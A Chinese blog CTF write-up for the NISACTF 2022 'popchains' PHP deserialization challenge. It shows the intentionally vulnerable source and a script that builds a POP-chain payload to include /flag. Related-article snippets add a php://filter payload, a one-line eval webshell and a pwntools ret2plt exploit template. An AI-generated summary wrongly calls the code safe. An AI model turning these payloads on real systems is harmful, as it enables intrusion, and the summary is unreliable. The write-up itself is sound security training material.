[NISACTF 2022]popchains

最新推荐文章于 2024-12-23 23:19:09 发布
最新推荐文章于 2024-12-23 23:19:09 发布
阅读量276 收藏 1
点赞数
分类专栏: nssctf 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kuzemax/article/details/130455088
版权
该PHP代码段展示了如何处理GET请求中的wish参数,并涉及到类的序列化与反序列化。在新年主题下,代码通过类的构造函数和魔术方法来确保文件包含操作的安全性,同时提及了尝试访问flag.php的潜在情景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/ 

<?php
class Road_is_Long{
    public $page;
    public $string; 
}
class Try_Work_Hard{
    protected  $var="/flag"; 
}
class Make_a_Change{
    public $effort; 
}

$a=new Road_is_Long;
$a->page=new Road_is_Long;
$a->page->string=new Make_a_Change;
$a->page->string->effort=new Try_Work_Hard;

echo urlencode(serialize($a));

?>

 

 

[NISACTF 2022]popchains - 反序列化+伪协议
oZuoShen123的博客
10-07 1587
链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
nssctf (1)
qq_61988806的博客
05-04 663
先找出口 很明显时 通过include 所以是append方法寻找调用append方法的地方发现__invoke魔术方法那调用__invoke方法当脚本尝试将对象调用为函数时触发寻找触发invoke的地方 发现 __get中function以函数执行get魔术方法读取不可访问的属性的值时会被调用寻找读取不可访问的属性的地方_toString 中$this->string->page 这里没有page这个属性的定义。
NSS [NISACTF 2022]popchains
Jay17的博客
04-12 331
NSS [NISACTF 2022]popchains
记做一次[NISACTF 2022]popchains
dangwobucunzai的博客
03-09 408
此处中访问string的page属性,若是将string设为一个Try_Work_Hard的对象,在此处调用Try_Work_Hard的对象的page属性,而Try_Work_Hard中并没有page属性,是不是就可以在此处实现调用__get()到这里,思路暂定为:先定义两个Road_is_Long的对象Road_is_Long1和Road_is_Long2,将Road_is_Long1的属性page设置为Road_is_Long2,在执行到如下代码时。方法,那么 PHP 就会自动调用这个方法。
[NISACTF 2022]
snowlyzz的博客
09-09 6437
NISACTF部分WP
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
CTF web解题 [NISACTF 2022]popchains PHP反序列化 pop链
m0_74823863的博客
12-23 910
不积跬步无以至千里 不积小流无以成江海对web方向有了更近一步的了解,根据一道题目来学习PHP反序列化及pop链。
解:[NISACTF 2022]popchains--TLS_预备队任务(1)
river_mouth_man的博客
03-08 714
php反序列化,构造pop链
[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)
Welcome To Myon'Blog !
07-06 2394
一、理清pop链并进行标注 二、如何编写相关脚本 三、过滤与绕过 1、waf的绕过 2、preg_match的绕过
[NISACTF 2022]下
qq_62046696的博客
07-30 2865
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
NSSCTF web题记录
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1861
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
NSSCTF中的popchains、level-up、 What is Web、 Interesting_http、 BabyUpload
2401_82388450的博客
06-05 1185
@eval($_POST[shell]);
pop构造链表(细节)
qq_62046696的博客
07-13 440
现在学的是如何构造链表,找链子,要找链子魔术方法一定要特别清楚 首先,先找起点和终点,终点一般都是一些执行函数比如eval,看见了include(flag.php)终点确定,起点就是 _destruct看了一圈发现了w33m类中的__toString()中有个函数调用而且类名和函数名都是变量,那么这个__toString() 就和Getflag()连接起来了,再向前推,触发__toString()的条件是当一个对象被当作字符串处理,一看便看到了w22m中__destruct()w22m-->>dest
NSSCTF web刷题
akxnxbshai的博客
08-15 4380
闲来无聊写一写NSSCTF。
pie保护 pwn 例题
最新发布
01-06
### 关于PIE保护机制下的PWN攻击实例 在存在位置无关可执行文件(Position Independent Executable, PIE)的情况下,程序加载地址会在每次运行时被随机化。这增加了利用漏洞的难度,因为传统的返回导向编程(ROP)依赖固定的基址来计算目标函数或gadget的位置。 然而,在某些情况下仍然可以实施有效的攻击策略。例如,在未完全启用RELRO的部分程序中可能存在动态链接表(Global Offset Table, GOT)条目重写的机会[^1]。对于这类情形,可以通过泄露库函数的实际地址并结合偏移量找到系统调用或其他有用功能的确切位置。 当面对开启了PIE但其他安全措施较弱的目标时,一种常见的方法是通过信息泄漏获取当前映像基址,之后再构建针对特定版本二进制文件已知布局的payload来进行控制转移。下面给出一个基于`ret2plt`技巧的具体案例分析: #### 实战演练:CTF挑战题目的解析 考虑一道名为“ezpie”的题目来自NISACTF 2022竞赛[^2]。此题提供了一个易受攻击的服务端应用,它虽然启用了PIE特性却未能充分设置栈溢出防护机制。这意味着如果能够绕过ASLR的影响,则有可能实现远程代码执行。 为了完成这一任务,选手们通常会采取如下手段之一: - 利用格式字符串错误读取内存中的关键数据片段; - 或者借助UAF (Use After Free) 缺陷间接访问已经释放的对象结构体成员变量; 无论哪种方式获得的信息都可以帮助定位libc.so及其他重要模块的真实起始点,从而为进一步规划rop chain奠定基础。 ```python from pwn import * # 建立连接至服务 conn = remote('target_ip', port) # 发送恶意输入触发缓冲区溢出条件... conn.sendlineafter(b'prompt:', payload) # 接收响应包内含潜在有价值的指针值 leaked_ptr = u64(conn.recvuntil(b'\n').strip().ljust(8,b'\x00')) log.info(f"Leaked pointer @ {hex(leaked_ptr)}") base_addr = leaked_ptr - known_offset_from_libc_base_to_leak_point system_plt = base_addr + offset_of_system_in_libc bin_sh_str = base_addr + offset_of_binsh_string_in_libc final_payload = b'A'*offset_until_retaddr \ + p64(system_plt) \ + p64(ret_gadget_if_needed) \ + p64(bin_sh_str) conn.sendline(final_payload) conn.interactive() ``` 上述脚本展示了如何与远端服务器交互,并尝试构造合适的载荷以期达成命令注入的目的。当然实际操作过程中还需要根据具体情况调整细节部分如偏移量等参数设定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值